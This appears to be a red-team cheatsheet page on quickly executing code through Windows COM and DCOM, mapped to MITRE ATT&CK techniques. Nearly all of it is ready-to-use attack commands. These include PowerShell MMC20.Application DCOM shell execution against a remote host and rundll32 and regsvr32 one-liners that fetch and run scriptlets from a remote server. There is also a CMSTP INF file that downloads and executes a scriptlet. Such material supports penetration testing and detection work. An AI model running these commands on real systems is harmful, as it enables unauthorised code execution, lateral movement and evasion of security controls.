0xSh3rr1nf0rd
Search
⌃K
📜

COM Execution - T1559.001

Templates and methods of quickly executing COM and DCOM
Windows Components Object Model quick execution cheatsheet

Powershell

Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID

Execution via CLSID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Execution via ProgID

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

DCOM Execution

Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed Locally by specifying the loopback interface (127.0.0.1)
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Rundll32

Execution via CLSID

Rundll32.exe -sta {GUID}

Execution via ProgID

Rundll32.exe -sta Scripting.Dictionary

Execution via shell32.dll

# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}

Scriptlet Execution from Remote Server

# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:http://127.0.0.1:8080/calc.sct").Exec();

Remote Scriptlet via INF file

# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1

Regsvr32

COM Local Scriptlet Execution

# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct

COM Scriptlet Execution from Remote Server

# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll

CMSTP

Execution via INF file that downloads and executes a scriptlet (sct)
# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
cmstp.exe /su test.inf
Credit to @Amr_Thabet for the INF code

PyCOM

🛠

Verclsid

Execution via CLSID

verclsid.exe /S /C {CLSID}

Xwizard

Execution via CLSID

xwizard.exe RunWizard /taero /u {CLSID}

ATT&CK Techniques in this Page

  • Command and Scripting Interpreter: PowerShell - T1059.001
  • Inter-Process Communication: Component Object Model - T1559.001
  • System Binary Proxy Execution: CMSTP - T1218.003
  • System Binary Proxy Execution: Rundll32 - T1218.011
  • System Binary Proxy Execution: Verclsid - T1218.012
  • System Binary Proxy Execution: Regsvr32 - T1218.010
Previous
COM Hijacking - T1546.015
Next - Internals, Reversing
Windows Exploit Mitigations
Last modified 4mo ago